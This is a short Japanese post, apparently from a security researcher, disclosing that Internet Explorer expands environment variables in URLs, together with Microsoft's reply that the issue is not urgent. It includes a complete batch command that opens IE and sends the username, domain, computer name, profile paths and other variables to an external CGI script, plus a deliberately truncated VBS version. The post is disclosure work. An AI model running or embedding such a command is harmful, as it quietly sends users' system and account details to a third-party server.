環境変数が展開されて相手のサーバに渡る事について、MSに質問した
ところ、「緊急を要する脆弱性ではない」との判断が・・・。
理由としては「ＩＥに直接入力しなければ実行できない」とあるが、
下記のようなバッチファイルを作成し、実行しても同様な現象が発生する。

バッチファイルの例

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" "www.pbh.jp/cgi-bin/t2.cgi?ALLUSERSPROFILE=%ALLUSERSPROFILE%&APPDATA=%APPDATA%&CommonProgramFiles=%CommonProgramFiles%&COMPUTERNAME=%COMPUTERNAME%&ComSpec=%ComSpec%&HOMEDRIVE=%HOMEDRIVE%&HOMEPATH=%HOMEPATH%&LOGONSERVER=%LOGONSERVER%&NUMBER_OF_PROCESSORS=%NUMBER_OF_PROCESSORS%&OS=%OS%&Os2LibPath=%Os2LibPath%&Path=%Path%&PATHEXT=%PATHEXT%&PROCESSOR_ARCHITECTURE=%PROCESSOR_ARCHITECTURE%&PROCESSOR_IDENTIFIER=%PROCESSOR_IDENTIFIER%&PROCESSOR_LEVEL=%PROCESSOR_LEVEL%&PROCESSOR_REVISION=%PROCESSOR_REVISION%&ProgramFiles=%ProgramFiles%&PROMPT=%PROMPT%&SystemDrive=%SystemDrive%&SystemRoot=%SystemRoot%&TEMP=%TEMP%&TMP=%TMP%&USERDNSDOMAIN=%USERDNSDOMAIN%&USERDOMAIN=%USERDOMAIN%&USERNAME=%USERNAME%&USERPROFILE=%USERPROFILE%&windir=%windir%"

VBSの例（悪用防止のため未完成版）

Set oIE=CreateObject("InternetExplorer.Application")
oIE.Application.visible=true
oIE.Navigate "www.pbh.jp/cgi-bin/t2.cgi?ALLUSERSPROFILE=%ALLUSERSPROFILE%&APPDATA=%APPDATA%&CommonProgramFiles=%CommonProgramFiles%&COMPUTERNAME=%COMPUTERNAME%&ComSpec=%ComSpec%&HOMEDRIVE=%HOMEDRIVE%&HOMEPATH=%HOMEPATH%&LOGONSERVER=%LOGONSERVER%&NUMBER_OF_PROCESSORS=%NUMBER_OF_PROCESSORS%&OS=%OS%&Os2LibPath=%Os2LibPath%&Path=%Path%&PATHEXT=%PATHEXT%&PROCESSOR_ARCHITECTURE=%PROCESSOR_ARCHITECTURE%&PROCESSOR_IDENTIFIER=%PROCESSOR_IDENTIFIE

また、vbsでも同様に実行可能であろうと推測できる。
そういった事を踏まえて再度ＭＳに対して送るが、同様の回答であった。

MS様、この内容について公開することを許可頂きありがとうございました。
本件公開が、御社の発展にならぬ事を、心よりお祈り申し上げます。